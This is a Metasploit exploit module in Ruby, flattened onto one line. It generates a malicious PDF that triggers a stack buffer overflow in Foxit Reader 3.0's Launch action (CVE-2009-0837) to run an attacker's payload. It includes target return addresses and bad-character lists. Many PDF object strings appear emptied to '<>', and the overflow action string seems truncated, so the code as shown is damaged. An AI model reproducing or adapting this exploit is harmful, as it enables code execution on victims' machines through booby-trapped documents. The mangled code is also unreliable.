## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. Due to the way Foxit Reader handles the input from an "Launch" action, it is possible to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Francisco Falcon', # Discovery 'bannedit' # Metasploit module ], 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0837' ], [ 'OSVDB', '55614' ], [ 'BID', '34035'], [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" }, 'Platform' => 'win', 'Targets' => [ [ 'Foxit Reader 3.0 Windows XP SP2', { 'Ret' => 0x74d34d3f} ], # ebp + offset ], 'DisclosureDate' => 'Mar 09 2009', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit pdf = make_pdf file_create(pdf) handler end def make_pdf action = "\n<>/NewWindow true>>" pdf = "%PDF-1.4\n" pdf << "1 0 obj\n" pdf << "<>/Contents 2 0 R " pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" pdf << "endobj\n" pdf << "4 0 obj\n" pdf << "<>\n" pdf << "endobj\n" pdf << "7 0 obj\n" pdf << "<>\n" pdf << "endobj\n" pdf << "9 0 obj\n" pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" pdf << "endobj\n" pdf << "16 0 obj\n" pdf << action pdf << "endobj\n" pdf << "17 0 obj\n" pdf << "<>\n" pdf << "endobj\n" pdf << "trailer\n" pdf << "<<00000000000000000000000000000000>]" pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" pdf << "startxref\n" pdf << "0000\n" pdf << "%%EOF\n" pdf end end